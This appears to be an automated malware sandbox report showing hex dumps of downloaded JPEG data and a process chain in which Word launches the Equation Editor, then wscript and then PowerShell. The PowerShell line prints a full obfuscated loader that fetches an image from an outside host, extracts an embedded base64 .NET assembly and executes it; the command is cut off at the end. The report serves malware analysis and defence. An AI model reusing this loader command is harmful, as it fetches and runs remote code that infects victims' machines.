2024-04-20 09:36:05 UTC	668	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1 Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
2024-04-20 09:36:05 UTC	1369	IN	Data Raw: 02 ac c1 af d4 6f e1 95 2e 54 7a 99 be b9 63 d3 ad 1c a9 63 d2 be b8 15 dc 4a 9b b5 f6 ac 1a 1d a4 90 41 f9 f5 cb 17 56 b0 39 f7 ca 11 67 70 34 3b e0 19 9c 70 c7 be 09 9c 37 21 fa 76 ca b3 a0 53 7e 9c 42 5d 62 23 10 87 76 03 6f 2e c3 b8 da df b6 25 36 bf 69 21 3f 35 c4 e6 d4 3c b6 49 a1 82 02 c7 4f ae 05 84 f2 4b 7e 6b b6 df 6c b3 6d d8 28 82 3d bb e5 42 9a ce a7 1c 91 81 c0 2a b0 a5 a3 84 2c 78 be bd b0 04 d9 e9 47 df 08 1e a8 55 9c 0b 96 35 c9 a1 92 08 f7 bf 86 50 9d c0 ae de bc 61 b4 da 79 27 72 91 45 b9 c2 ee da 18 02 c0 72 76 8e fc 5e 01 75 1a 59 74 e1 37 15 2a e0 30 75 e4 72 a0 d7 cf 9c 09 24 55 fe 78 f4 b2 09 9b ee cc 41 2d 0c 4f 19 ed b8 46 b6 39 f7 16 3e 75 99 c5 82 c6 49 5e 4f 1f 5e ff 00 96 05 67 d4 79 34 41 b2 d9 9a ee ce e5 9b 92 70 9b 99 a5 Data Ascii: o.TzccJAV9gp4;p7!vS~B]b#vo.%6i!?5<IOK~klm(=B,xGU5Pay'rErv^uYt70ur$UxA-OF9>uI^O^gy4Ap
2024-04-20 09:36:05 UTC	1369	IN	Data Raw: 48 f4 c5 56 48 d9 87 25 56 1e 41 ae 79 bf e9 81 0d e2 32 08 62 56 d4 c8 4a 93 bb 69 0a d5 db af e5 8d cb e2 41 e1 60 81 c1 b0 4b 3d 5f e4 3a e6 02 10 5f 8e a3 9e 98 fc 65 44 44 96 dc 6f f2 c0 d9 8b 58 da 88 99 c3 b2 81 01 02 8d 5b 7b e6 47 8a 4a 1a 18 d1 9e 47 7d c4 ee 77 0d fc ba 61 0b 95 87 ad 02 38 cc bf 25 9f 73 03 64 1b ac 0e 0a 5b 4a 38 24 86 e0 63 4c e9 0c 70 5c 60 8b 36 0f cc 64 96 29 a7 24 a9 e9 db 04 b1 2c ba 65 63 a8 00 29 e4 1e d8 02 dc fe 71 28 36 96 3e 9e 68 01 7c 65 b5 29 32 1b 96 cb 29 da 5b 75 f3 d7 0f f7 64 91 77 19 d5 52 bd 3c 65 9a 04 3a 32 ad 39 dc be aa 2b d7 e5 80 9c 9a 93 2c 41 4f 51 96 d3 ea a5 88 6c 41 b9 79 b5 f7 c5 c0 06 ef 8e 31 dd 14 48 ee a0 3d 12 68 9c 06 fc 3f 4b 2e a7 54 b2 4d 4b 08 e4 82 78 61 ed 9b f3 6a 67 99 d7 c3 b4 Data Ascii: HVH%VAy2bVJiA`K=_:_eDDoX[{GJG}wa8%sd[J8$cLp\`6d)$,ec)q(6>h\|e)2)[udwR<e:29+,AOQlAy1H=h?K.TMKxajg
2024-04-20 09:36:05 UTC	1369	IN	Data Raw: 06 c9 2d 5c 6d c4 1f 54 e1 fc c6 72 37 71 4c 7a fc b1 32 69 85 9d cc 4f 37 99 5a ed 73 b7 89 69 f4 b6 41 17 25 1f 6e 47 18 1b 52 eb 3f 7b cf 4f 7c 13 6a 06 e0 43 7d 31 39 81 65 b0 7b e5 51 59 85 12 70 1b 1a b2 58 9b af 86 10 6a 83 70 c4 13 ef ed 88 ec 2c c7 a8 ac a9 47 57 ba 24 55 f1 81 a3 bd 9d 96 98 71 dc e5 5e 42 a5 bd 56 40 bf 86 2e 8c 01 50 7b e4 3b 30 6b 09 60 f0 6f a5 60 59 f5 4d d0 1b e2 f1 49 b5 74 a7 77 43 c5 e1 24 65 0a d4 45 8e c3 12 d8 b3 ab 2b 30 e3 9c 00 78 66 bb 4a 8d 2e 9f 4e 79 57 2c d6 73 45 75 8a 1b 69 60 2f a6 65 68 fc 3f 4f 0e b6 51 18 51 23 f2 79 ea 31 8d 58 8f 4f 0b 4f 35 05 41 ba fa 60 31 e2 1e 2d 16 82 07 9a 57 00 28 a0 3d ce 2b a3 f1 45 d4 e9 44 e2 c6 ee 68 e7 8b 79 e6 fb 53 e2 bb 01 2b a5 8b d4 07 be 7a b8 95 60 d3 ac 61 00 0a Data Ascii: -\mTr7qLz2iO7ZsiA%nGR?{O\|jC}19e{QYpXjp,GW$Uq^BV@.P{;0k`o`YMItwC$eE+0xfJ.NyW,sEui`/eh?OQQ#y1XOO5A`1-W(=+EDhyS+z`a
2024-04-20 09:36:05 UTC	1369	IN	Data Raw: d7 07 8b 3e f8 03 32 f9 ca c8 48 50 a3 af 73 92 1d 11 95 63 62 c2 b9 b1 9d 2e 98 46 14 06 1e af a8 c1 24 65 25 00 b0 2a 7a 9f 86 06 ae 85 92 2a 49 4d b1 4a a0 2e af 17 d5 44 04 a0 d9 00 37 e1 be b8 7d 23 23 48 18 20 6d b6 07 6c 36 a5 d2 66 08 83 6d 0b 22 ba e0 05 bc 37 4c f1 79 82 46 16 bb af ad fc 30 6a 9a 78 d6 b7 a0 20 d9 2b b8 11 fa 63 62 24 8d 89 67 01 54 32 ed 63 d2 86 2a 1f ef 0e 5e 38 d5 54 75 bf 6a c0 e8 60 f3 a2 a9 67 37 cf 1e a3 c5 fc b1 89 42 29 28 a3 70 07 6a 8f 80 1d 71 35 99 8a b1 0d b5 57 a0 3d b2 1f 56 1a 7a 2d 7e a2 45 8a c0 d0 1a 84 45 54 44 ed db be 66 4f a8 42 ce 80 35 6e ba ba e7 1a 56 de f6 a0 0f f1 57 7c 52 6d 1c 92 cc 5c 11 4c d4 49 ed 80 54 9d 95 55 54 b1 04 56 ef 6c 87 44 23 76 d6 af e2 20 61 e2 54 40 a9 76 40 ab f7 ce 62 e2 e8 Data Ascii: >2HPscb.F$e%zIMJ.D7}##H ml6fm"7LyF0jx +cb$gT2c*^8Tuj`g7B)(pjq5W=Vz-~EETDfOB5nVW\|Rm\LITUTVlD#v aT@v@b
2024-04-20 09:36:05 UTC	1369	IN	Data Raw: 1b 3a cd 34 1e 1a 3c a4 52 cc a5 76 d0 0c 4f 4b 61 78 1e 78 15 7e ab 7f 0c 63 4e 88 d2 84 31 17 b1 e9 50 c5 6b ea 30 22 c0 e2 f7 77 1d 86 71 90 af 73 7f 0c 0d 43 a1 a5 e3 4c a6 bb 89 5b 8f 9f a7 2a fa 22 bb 6f 4c b4 4d 7a 64 6a fa f1 8a c1 ac 9c cf 12 99 a6 71 b8 0d aa c6 cf 3d 33 d1 ce ea fa 56 31 a2 db 10 9c 80 6f ad 8a 3d aa ef 9c 0c 73 a0 43 75 a6 5a 06 8d cc c3 fa 67 2e 89 28 56 91 48 3d 0f 9a 48 fc eb 3d 01 82 3f 3b 72 a4 61 aa ba 00 55 7d 85 0e 9f 5c 21 86 c0 b0 a4 7b 0c 0f 3c 34 4a c7 8d 3a 90 3f fb 69 e3 ff 00 0e 17 4f e0 b3 4f 32 bc 5a 55 5e 6c 39 9d 97 69 1d 0f e1 eb 79 b8 23 8d 48 a2 01 ec 08 b1 92 0c 85 c9 f3 4d 8f 73 55 80 ac fe 0b 0e b3 c4 97 59 1c ac b2 ab 2b 48 cc cb 6a 55 46 d2 ab 55 46 8d df 4f 8f 4c c7 d4 e8 9b 4f 3e a4 69 b4 10 88 a1 Data Ascii: :4<RvOKaxx~cN1Pk0"wqsCL[*"oLMzdjq=3V1o=sCuZg.(VH=H=?;raU}\!{<4J:?iOO2ZU^l9iy#HMsUY+HjUFUFOLO>i
2024-04-20 09:36:05 UTC	1369	IN	Data Raw: 5a b4 72 3a 06 01 54 90 2e fa 66 7b a3 f9 62 40 a4 5d 7e 2e fc 60 2f 1a a2 3f 24 93 54 4f 61 8e 2d 4a 9b 56 e9 7a d6 26 59 88 36 aa 2b db 0b 1f 99 15 6d e7 70 bc 03 c9 28 8d 76 ef 00 f4 e7 28 60 0a 81 81 52 b4 4f 18 35 2c 75 54 e8 38 e8 48 be d8 e8 53 3c 2c a3 69 da 3a 03 47 f2 c0 41 b6 ae 98 28 71 ea e0 93 db 20 c6 87 4c 44 64 b1 2d 74 3e 58 ab 02 ac 45 11 cf 7c 6b 46 76 ab 10 81 be 78 14 92 09 56 15 77 71 b7 b0 38 c4 53 9d 52 ac 12 c4 0a a8 fc 43 a8 c0 49 1c f3 7a c2 96 5f 61 db 02 92 3c 36 14 95 f7 b1 80 6d 62 69 90 a8 81 f7 7f 88 9c 8d 14 eb a7 9c 3b 0b 5e f8 23 0b ed 57 23 86 e9 83 e4 58 c0 f4 4f af 86 d9 1b a1 1b 94 fb 9c 04 3e 27 3c 5a 95 96 34 2c 3f 0f 1e f9 89 cd 8b c7 a1 98 a4 41 4a 85 fe 21 7d f0 0f ad f1 4d 6b 6b 19 98 b2 1b e1 7d b1 87 d3 cd Data Ascii: Zr:T.f{b@]~.`/?$TOa-JVz&Y6+mp(v(`RO5,uT8HS<,i:GA(q LDd-t>XE\|kFvxVwq8SRCIz_a<6mbi;^#W#XO>'<Z4,?AJ!}Mkk}
2024-04-20 09:36:05 UTC	1369	IN	Data Raw: 82 31 dd 47 db 1d 13 85 1f 76 75 23 8f 4d 56 78 a0 db 5c 89 23 5d bd be 18 60 c1 e2 dc 63 5a 51 55 ef 81 e8 13 ed 54 52 b8 67 d3 35 06 21 42 f7 c7 f5 3f 6b f4 b0 e9 83 36 96 50 38 1c 1a 39 e4 21 7b e1 23 51 ec 79 eb 87 62 25 fd dc 88 ac 3b f2 70 37 0f da d8 1e 20 cb a5 9a 8f bb 62 69 f6 af 4b bd 80 d2 4a 0d f3 6d 99 4e a1 18 aa 00 54 76 ba c5 66 01 19 58 46 a0 9e 4d 1b c0 f4 9f fc 4d a0 59 96 63 a2 70 ed c7 5e 71 6d 5f da 5d 16 bb 4c d0 49 a3 93 67 00 8b eb 9e 73 57 aa 68 d3 7e d0 c7 b7 c3 07 0e a5 a7 87 70 00 71 c8 1e f8 1a de 1f e2 fa 0f 09 59 57 4d a1 98 96 3c 96 ec 31 98 be d6 69 8b 94 3a 47 51 d4 1b eb 98 7a 67 79 94 a1 b0 41 ac 60 e9 d5 c8 26 35 b5 e3 9e 30 35 9b ed 4c 09 3b 37 91 20 42 bd 3e 39 57 fb 53 a7 53 ea d3 48 54 fc 73 38 e9 8b 72 d1 aa a8 Data Ascii: 1Gvu#MVx\#]`cZQUTRg5!B?k6P89!{#Qyb%;p7 biKJmNTvfXFMMYcp^qm_]LIgsWh~pqYWM<1i:GQzgyA`&505L;7 B>9WSSHTs8r
2024-04-20 09:36:05 UTC	1369	IN	Data Raw: d0 9f 6c 57 5f 34 2f a5 6d 8c cd d3 9f 6e 71 af 23 4f 2a 2a 19 ce e6 21 78 42 07 e7 8a 6a fc 36 18 23 94 09 98 95 e9 cf 5c 04 9d 56 48 91 90 b1 a5 a2 3f ae 5c b2 4a ea cb 1a 92 00 5a 51 db df 2f a3 d8 a4 ab 10 23 22 c9 ee 49 ed 97 45 58 dd bc b1 e9 e8 d6 3a 57 38 03 48 9b ce e1 c8 37 c5 71 58 cc 40 34 92 16 56 25 56 c1 39 29 13 cc cc c3 8d a6 f2 f2 b1 d8 52 36 05 82 d3 57 d3 00 0f 36 e7 24 a9 6d c4 d0 1c e0 52 17 2e c4 13 63 db 8e 31 85 d3 ee 89 5c 1d ac b6 4f be 2b 36 a9 a1 b5 04 97 ef 7d b0 08 b0 97 3d 79 5e a7 13 9d 97 7e e1 5b b2 3c d9 ca ef 2d 4a c6 b2 d3 45 12 51 56 bb 17 f5 c0 e8 b5 0c 7d 3b aa ba 1f 7c 31 d4 c8 06 ed a4 af 7a c4 95 77 72 38 af 86 30 db cb 14 2f 60 76 18 04 49 3c c5 52 b4 08 fc 40 fc f1 89 1b 69 da 2a ab af c7 12 89 1d 24 21 40 03 Data Ascii: lW_4/mnq#O*!xBj6#\VH?\JZQ/#"IEX:W8H7qX@4V%V9)R6W6$mR.c1\O+6}=y^~[<-JEQV};\|1zwr80/`vI<R@i$!@
2024-04-20 09:36:05 UTC	1369	IN	Data Raw: b1 de f9 ce 8b 40 74 f1 23 89 4b 32 c8 64 7d de db 48 a3 f1 04 93 7e d8 8e af c5 f5 07 57 12 0d 39 d3 a6 e0 c4 b2 db 15 27 36 1e 09 5e 16 48 e4 65 0c 49 0d 60 70 47 b0 1d 7e a3 01 49 74 6b a9 8d 4e e2 50 a2 b6 d5 e4 1e 49 35 5c 59 f7 c6 84 70 a0 0c 23 0a 15 78 25 79 03 db 32 f4 11 eb 24 f1 a6 3a a9 e9 51 2f 62 31 0a 18 dd 0a ee 48 e4 e6 bc 8a ea db 55 0c 9c 85 36 68 55 e0 7c f3 ed 4a be 9b c4 d0 47 34 a5 5d 43 72 6a ba f1 9c 9a 8d 34 fa 38 fc e5 32 35 ed 0a 41 e0 9b 3d 47 3d b1 df b4 70 a6 a3 c7 e1 47 00 2f 93 7c 76 00 1e f9 e7 0a 9d 3e a4 84 2a c5 4d ab 29 b1 f0 fd 70 1c d6 68 d7 4a c1 96 65 65 6e 42 f3 78 a1 7d c7 36 f4 fe 1b 36 ae 17 d4 4f ea 91 d7 d0 a5 bf 13 76 24 df 18 b6 ab 45 14 5a 58 5c 3a ac db 03 32 96 14 dd 41 20 fc 0e 06 68 bb eb 43 0d 04 07 Data Ascii: @t#K2d}H~W9'6^HeI`pG~ItkNPI5\Yp#x%y2$:Q/b1HU6hU\|JG4]Crj4825A=G=pG/\|v>*M)phJeenBx}66Ov$EZX\:2A hC

Target ID:	0
Start time:	11:35:54
Start date:	20/04/2024
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Imagebase:	0x13f860000
File size:	1'423'704 bytes
MD5 hash:	9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	11:35:55
Start date:	20/04/2024
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase:	0x400000
File size:	543'304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	11:35:58
Start date:	20/04/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\IEneetworkinglover.vbs"
Imagebase:	0xf00000
File size:	141'824 bytes
MD5 hash:	979D74799EA6C8B8167869A68DF5204A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	11:36:00
Start date:	20/04/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreX